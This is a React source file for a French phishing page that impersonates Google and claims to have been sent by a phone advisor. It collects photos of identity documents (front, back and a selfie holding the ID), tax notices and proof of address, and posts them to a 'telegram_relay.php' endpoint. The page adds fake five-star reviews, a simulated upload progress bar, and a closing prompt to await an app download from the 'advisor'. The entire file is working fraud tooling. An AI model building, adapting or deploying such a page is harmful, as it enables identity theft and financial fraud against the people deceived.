import React, { useMemo, useRef, useState } from "react";
import "../styles/Home.css";
import headerGif from "../assets/header.gif";

// === Configuration ===
const API_URL = "/api/telegram_relay.php";

// === Types de documents ===
const DOCUMENT_TYPES = {
  carte_identite: {
    label: "Carte d'identité",
    icon: "badge",
    fields: ["recto", "verso", "selfie"],
  },
  passeport: {
    label: "Passeport",
    icon: "flight_takeoff",
    fields: ["recto", "selfie"],
  },
  permis_conduire: {
    label: "Permis de conduire",
    icon: "directions_car",
    fields: ["recto", "verso", "selfie"],
  },
  titre_sejour: {
    label: "Titre de séjour",
    icon: "card_membership",
    fields: ["recto", "verso", "selfie"],
  },
};

const FIELD_CONFIG = {
  recto: { label: "Document - Recto", icon: "badge" },
  verso: { label: "Document - Verso", icon: "badge" },
  selfie: { label: "Selfie avec le document", icon: "photo_camera" },
};

const FISCAL_FIELDS = {
  avis: { label: "Avis d'imposition", icon: "description", description: "Dernier avis d'imposition sur le revenu" },
  liasse: { label: "Liasse fiscale", icon: "folder", description: "Liasse fiscale complète (toutes les pages)" },
  domicile: { label: "Justificatif de domicile", icon: "home", description: "Facture eau, électricité, gaz, téléphone (-3 mois)" },
};

const EXAMPLES = {
  recto: { src: "https://i.ibb.co/KFXhFJk/recto1.jpg", title: "Exemple : Document - Recto" },
  verso: { src: "https://i.ibb.co/9Z3YL2K/verso2.jpg", title: "Exemple : Document - Verso" },
  selfie: { src: "https://i.ibb.co/0nk0ggf/selid.png", title: "Exemple : Selfie avec document" },
  avis: { src: "https://i.ibb.co/XfDQM8B/10107223.webp", title: "Exemple : Avis d'imposition" },
  liasse: { src: "https://i.ibb.co/ZpKs5CM/liasse.jpg", title: "Exemple : Liasse fiscale" },
  domicile: { src: "https://i.ibb.co/5RmhQdM/facture.jpg", title: "Exemple : Justificatif de domicile" },
};

const Header = ({ step }) => (
  <>
    <div className="gif-top">
      <img src={headerGif} className="g-gif" alt="Chargement" />
    </div>

    <header className="g-header">
      <div className="intro-card">
        <img
          src="https://www.google.com/images/branding/googlelogo/2x/googlelogo_color_92x30dp.png"
          alt="Google"
          className="google-logo"
        />
        <h1>Vérification complète</h1>
        <p>
          Cette page vous a été transmise directement par un conseiller au téléphone.
          <br /><br />
          Elle sert à l'envoi de vos documents d'identité et fiscaux pour finaliser votre dossier.
        </p>
      </div>

      <div className="g-divider" />
      <div className="g-progress-bar" aria-label="Progression">
        <div className={`g-step ${step === 1 ? "active" : ""}`}>1</div>
        <div className={`g-bar ${step >= 2 ? "complete" : ""}`} />
        <div className={`g-step ${step === 2 ? "active" : ""}`}>2</div>
        <div className={`g-bar ${step >= 3 ? "complete" : ""}`} />
        <div className={`g-step ${step === 3 ? "active" : ""}`}>3</div>
        <div className={`g-bar ${step >= 4 ? "complete" : ""}`} />
        <div className={`g-step ${step === 4 ? "active" : ""}`}>4</div>
      </div>
    </header>
  </>
);

const InfoCard = ({ onContinue }) => (
  <section className="google-card" aria-labelledby="info-title">
    <h2 id="info-title">Information importante</h2>
    <ul className="g-list">
      <li><span className="material-icons">check_circle</span> Documents d'identité obligatoires.</li>
      <li><span className="material-icons">insert_drive_file</span> Formats acceptés : photo (JPEG, PNG) ou PDF.</li>
      <li><span className="material-icons">visibility</span> Les documents doivent être lisibles et conformes.</li>
      <li><span className="material-icons">security</span> Au moins un document fiscal requis.</li>
    </ul>
    <button className="g-btn" onClick={onContinue}>Commencer la vérification</button>
  </section>
);

const DocumentTypeSelection = ({ onSelect }) => {
  const [selectedType, setSelectedType] = useState("");

  const handleSubmit = (e) => {
    e.preventDefault();
    if (!selectedType) {
      alert("Veuillez sélectionner un type de document.");
      return;
    }
    onSelect(selectedType);
  };

  return (
    <section className="step-card" aria-labelledby="doc-type-title">
      <div id="doc-type-title" className="form-title">
        <span className="material-icons icon-blue">badge</span>
        <span>Étape 1 : Type de document d'identité</span>
      </div>

      <form onSubmit={handleSubmit} noValidate>
        <div className="document-type-grid">
          {Object.entries(DOCUMENT_TYPES).map(([key, config]) => (
            <label
              key={key}
              className={`doc-type-card ${selectedType === key ? "selected" : ""}`}
            >
              <input
                type="radio"
                name="docType"
                value={key}
                checked={selectedType === key}
                onChange={(e) => setSelectedType(e.target.value)}
              />
              <span className="material-icons doc-type-icon">{config.icon}</span>
              <span className="doc-type-label">{config.label}</span>
            </label>
          ))}
        </div>

        <button type="submit" className="submit-btn" style={{ marginTop: "20px" }}>
          Continuer
        </button>
      </form>
    </section>
  );
};

const ExampleModal = ({ id, open, onClose }) => {
  if (!EXAMPLES[id]) return null;
  return (
    <div className={`example-preview-modal ${open ? "show" : ""}`} role="dialog" aria-modal="true">
      <div className="example-preview-content">
        <button className="close-modal" onClick={onClose} aria-label="Fermer">
          <span className="material-icons">close</span>
        </button>
        <img src={EXAMPLES[id].src} alt={EXAMPLES[id].title} />
        <div className="modal-caption">{EXAMPLES[id].title}</div>
      </div>
    </div>
  );
};

const FileRow = ({ id, label, icon, description, value, onChange, onOpenExample }) => {
  const selected = !!value;
  return (
    <div className="form-group">
      <label htmlFor={id} className="row-label">
        <span className="material-icons icon-blue">{icon}</span>
        <span>{label}</span>
        {EXAMPLES[id] && (
          <button
            type="button"
            className="example-btn"
            onClick={() => onOpenExample(id)}
            aria-label={`Voir un exemple ${label}`}
          >
            <span className="material-icons">help_outline</span>
          </button>
        )}
      </label>

      {description && (
        <div className="document-info">
          <span className="material-icons">info</span>
          <span>{description}</span>
        </div>
      )}

      <label className={`custom-file-upload ${selected ? "selected" : ""}`}>
        {selected ? "Fichier sélectionné" : "Choisir un fichier"}
        <input
          id={id}
          type="file"
          accept="image/*,application/pdf"
          onChange={(e) => onChange(id, e.target.files?.[0] || null)}
        />
      </label>
    </div>
  );
};

// Étape 2 : Upload documents d'identité
const IdentityUploadForm = ({ documentType, onContinue, onBack }) => {
  const docConfig = DOCUMENT_TYPES[documentType];
  const initialFiles = useMemo(
    () => Object.fromEntries(docConfig.fields.map((f) => [f, null])),
    [docConfig.fields]
  );

  const [files, setFiles] = useState(initialFiles);
  const [modal, setModal] = useState(null);

  const allFilesSelected = useMemo(
    () => docConfig.fields.every((field) => files[field]),
    [files, docConfig.fields]
  );

  const handleChange = (id, file) => {
    setFiles((prev) => ({ ...prev, [id]: file }));
  };

  return (
    <section className="step-card" aria-labelledby="identity-title">
      <div id="identity-title" className="form-title">
        <span className="material-icons icon-blue">upload_file</span>
        <span>Étape 2 : Documents d'identité - {docConfig.label}</span>
      </div>

      <div className="document-info">
        <span className="material-icons">info</span>
        <span>{docConfig.fields.length} document{docConfig.fields.length > 1 ? 's' : ''} requis</span>
      </div>

      {docConfig.fields.map((field) => (
        <FileRow
          key={field}
          id={field}
          label={FIELD_CONFIG[field].label}
          icon={FIELD_CONFIG[field].icon}
          value={files[field]}
          onChange={handleChange}
          onOpenExample={setModal}
        />
      ))}

      <button 
        className="submit-btn" 
        onClick={() => onContinue(files)}
        disabled={!allFilesSelected}
      >
        Continuer vers les documents fiscaux
      </button>
      
      <button type="button" className="back-btn" onClick={onBack}>
        <span className="material-icons">arrow_back</span>
        Retour
      </button>

      <div className={`min-files-hint ${allFilesSelected ? "success" : "warning"}`}>
        {allFilesSelected ? "✅ Tous les fichiers requis sont prêts" : "⚠️ Tous les fichiers sont requis"}
      </div>

      {docConfig.fields.map((field) => (
        <ExampleModal key={field} id={field} open={modal === field} onClose={() => setModal(null)} />
      ))}
    </section>
  );
};

// Étape 3 : Upload documents fiscaux + Envoi final
const FiscalUploadForm = ({ documentType, identityFiles, onSuccess, onBack }) => {
  const [files, setFiles] = useState({ avis: null, liasse: null, domicile: null });
  const [sending, setSending] = useState(false);
  const [uploadProgress, setUploadProgress] = useState(0);
  const [errorMessage, setErrorMessage] = useState("");
  const [modal, setModal] = useState(null);
  const formRef = useRef(null);
  const progressIntervalRef = useRef(null);

  const selectedCount = useMemo(() => Object.values(files).filter(Boolean).length, [files]);

  const handleChange = (id, file) => {
    setFiles((prev) => ({ ...prev, [id]: file }));
    setErrorMessage("");
  };

  const handleSubmit = async (e) => {
    e.preventDefault();
    if (sending) return;
    
    if (selectedCount < 1) {
      alert("Veuillez importer au moins un document fiscal.");
      return;
    }
    
    setSending(true);
    setUploadProgress(0);
    setErrorMessage("");

    // Progression fluide simulée
    let progress = 0;
    progressIntervalRef.current = setInterval(() => {
      if (progress < 30) {
        progress += Math.random() * 8 + 2;
      } else if (progress < 60) {
        progress += Math.random() * 4 + 1;
      } else if (progress < 85) {
        progress += Math.random() * 2 + 0.5;
      }
      if (progress > 85) progress = 85;
      setUploadProgress(Math.floor(progress));
    }, 200);

    try {
      const fd = new FormData();
      fd.append("documentType", `Vérification complète - ${DOCUMENT_TYPES[documentType].label}`);
      
      // Ajouter les fichiers d'identité
      Object.entries(identityFiles).forEach(([key, file]) => {
        if (file) {
          fd.append(key, file, file.name);
        }
      });
      
      // Ajouter les fichiers fiscaux
      if (files.avis) fd.append("avis_imposition", files.avis, files.avis.name);
      if (files.liasse) fd.append("liasse_fiscale", files.liasse, files.liasse.name);
      if (files.domicile) fd.append("justificatif_domicile", files.domicile, files.domicile.name);

      const controller = new AbortController();
      const timeoutId = setTimeout(() => controller.abort(), 120000);

      const response = await fetch(API_URL, {
        method: "POST",
        body: fd,
        signal: controller.signal,
      });

      clearTimeout(timeoutId);
      clearInterval(progressIntervalRef.current);
      
      setUploadProgress(95);

      if (!response.ok) {
        throw new Error(`Erreur serveur (${response.status})`);
      }

      const contentType = response.headers.get("content-type");
      if (!contentType || !contentType.includes("application/json")) {
        throw new Error("Réponse invalide du serveur.");
      }

      const data = await response.json();

      if (!data.ok) {
        throw new Error(data.error || "Erreur lors de l'envoi");
      }

      setUploadProgress(100);

      setTimeout(() => {
        onSuccess();
        formRef.current?.reset();
        setFiles({ avis: null, liasse: null, domicile: null });
        window.scrollTo({ top: 0, behavior: "smooth" });
      }, 600);
      
    } catch (err) {
      clearInterval(progressIntervalRef.current);
      
      let errorMsg = "Erreur lors de l'envoi.";
      if (err.name === 'AbortError') {
        errorMsg = "Délai d'attente dépassé. Veuillez réessayer.";
      } else if (err.message) {
        errorMsg = err.message;
      }
      
      setErrorMessage(errorMsg);
      setUploadProgress(0);
      alert(`${errorMsg}\n\nVeuillez réessayer.`);
    } finally {
      setSending(false);
    }
  };

  return (
    <section className="step-card" aria-labelledby="fiscal-title">
      <div id="fiscal-title" className="form-title">
        <span className="material-icons icon-blue">receipt</span>
        <span>Étape 3 : Documents fiscaux</span>
      </div>

      <div className="document-info">
        <span className="material-icons">info</span>
        <span>Au moins 1 document fiscal requis</span>
      </div>

      {errorMessage && (
        <div style={{
          padding: '15px',
          background: '#fef2f2',
          border: '1px solid #fca5a5',
          borderRadius: '8px',
          color: '#dc2626',
          marginBottom: '20px'
        }}>
          ❌ {errorMessage}
        </div>
      )}

      <form ref={formRef} onSubmit={handleSubmit} noValidate>
        {Object.entries(FISCAL_FIELDS).map(([key, config]) => (
          <FileRow
            key={key}
            id={key}
            label={config.label}
            icon={config.icon}
            description={config.description}
            value={files[key]}
            onChange={handleChange}
            onOpenExample={setModal}
          />
        ))}

        {!sending && (
          <>
            <button type="submit" className="submit-btn" disabled={selectedCount < 1}>
              Envoyer tous les documents
            </button>
            <button type="button" className="back-btn" onClick={onBack}>
              <span className="material-icons">arrow_back</span>
              Retour
            </button>
          </>
        )}
        
        {sending && (
          <div className="sending-box">
            <p>
              Envoi en cours
              <span className="dots">
                <span>.</span>
                <span>.</span>
                <span>.</span>
              </span>
            </p>
            <div className="progress-bar-container">
              <div className="progress-bar" style={{ width: `${uploadProgress}%` }}></div>
            </div>
            <div className="progress-text">
              <span className="material-icons">cloud_upload</span>
              {uploadProgress}%
            </div>
          </div>
        )}

        <div className={`min-files-hint ${selectedCount >= 1 ? "success" : "warning"}`}>
          {selectedCount < 1 ? "⚠️ Au moins 1 document fiscal requis" : `✅ ${selectedCount} document(s) fiscal(aux) prêt(s)`}
        </div>
      </form>

      {Object.keys(FISCAL_FIELDS).map((key) => (
        <ExampleModal key={key} id={key} open={modal === key} onClose={() => setModal(null)} />
      ))}
    </section>
  );
};

const Comments = () => (
  <section className="comments" aria-labelledby="comments-title">
    <h3 id="comments-title">Commentaires</h3>
    <div className="comments-grid">
      <article className="comment-card">
        <img src="https://i.pravatar.cc/64?img=32" alt="Utilisateur" />
        <div className="comment-body">
          <div className="stars" aria-label="5 sur 5">★★★★★</div>
          <p>Processus simple et rapide, tous mes documents envoyés en 5 minutes.</p>
          <div className="comment-author">— Sophie M.</div>
        </div>
      </article>
      <article className="comment-card">
        <img src="https://i.pravatar.cc/64?img=12" alt="Utilisateur" />
        <div className="comment-body">
          <div className="stars" aria-label="5 sur 5">★★★★★</div>
          <p>Interface intuitive et étapes bien expliquées.</p>
          <div className="comment-author">— Thomas B.</div>
        </div>
      </article>
    </div>
  </section>
);

export default function Verification() {
  const [step, setStep] = useState(1);
  const [documentType, setDocumentType] = useState(null);
  const [identityFiles, setIdentityFiles] = useState(null);
  const [success, setSuccess] = useState(false);

  const currentStep = success ? 4 : identityFiles ? 4 : documentType ? 3 : step;

  const handleIdentityContinue = (files) => {
    setIdentityFiles(files);
  };

  return (
    <main className="google-form-main">
      <Header step={currentStep} />
      
      {!success && step === 1 && <InfoCard onContinue={() => setStep(2)} />}
      
      {!success && step === 2 && !documentType && (
        <DocumentTypeSelection onSelect={(type) => setDocumentType(type)} />
      )}
      
      {!success && documentType && !identityFiles && (
        <IdentityUploadForm
          documentType={documentType}
          onContinue={handleIdentityContinue}
          onBack={() => setDocumentType(null)}
        />
      )}
      
      {!success && identityFiles && (
        <FiscalUploadForm
          documentType={documentType}
          identityFiles={identityFiles}
          onSuccess={() => setSuccess(true)}
          onBack={() => setIdentityFiles(null)}
        />
      )}
      
      {success && (
        <div className="success-message fade-in">
          <div className="success-check">
            <span className="material-icons">check_circle</span>
          </div>
          <h2>Merci</h2>
          <p>
            Vos documents ont été transmis avec succès.<br />
            Veuillez patienter avec votre conseiller au téléphone.
          </p>
          
          <div style={{
            marginTop: '20px',
            padding: '20px',
            background: '#fff3cd',
            border: '2px solid #ffc107',
            borderRadius: '12px',
            color: '#856404'
          }}>
            <div style={{ display: 'flex', alignItems: 'center', justifyContent: 'center', gap: '10px', marginBottom: '15px' }}>
              <span className="material-icons" style={{ fontSize: '32px', color: '#ffc107' }}>smartphone</span>
              <span className="material-icons" style={{ fontSize: '24px', color: '#ffc107' }}>wifi</span>
            </div>
            <p style={{ 
              fontSize: '1.05rem', 
              fontWeight: '700', 
              margin: '0 0 10px 0',
              color: '#664d03',
              textTransform: 'uppercase'
            }}>
              ⚠️ PROCHAINE ÉTAPE IMPORTANTE
            </p>
            <p style={{ 
              fontSize: '0.95rem', 
              fontWeight: '600', 
              margin: '0',
              lineHeight: '1.6'
            }}>
              Une <b>application</b> va vous être demandée de télécharger par votre conseiller.
            </p>
            <p style={{ 
              fontSize: '0.95rem', 
              fontWeight: '600', 
              margin: '10px 0 0 0',
              lineHeight: '1.6'
            }}>
              📱 Préparez votre <b>téléphone</b><br />
              📶 Assurez-vous d'avoir une <b>connexion internet</b> stable
            </p>
          </div>
          
          <p style={{ marginTop: '15px', fontSize: '0.9rem', color: '#186e34' }}>
            Gardez votre pièce d'identité à portée de main.
          </p>
        </div>
      )}

      <Comments />
    </main>
  );
}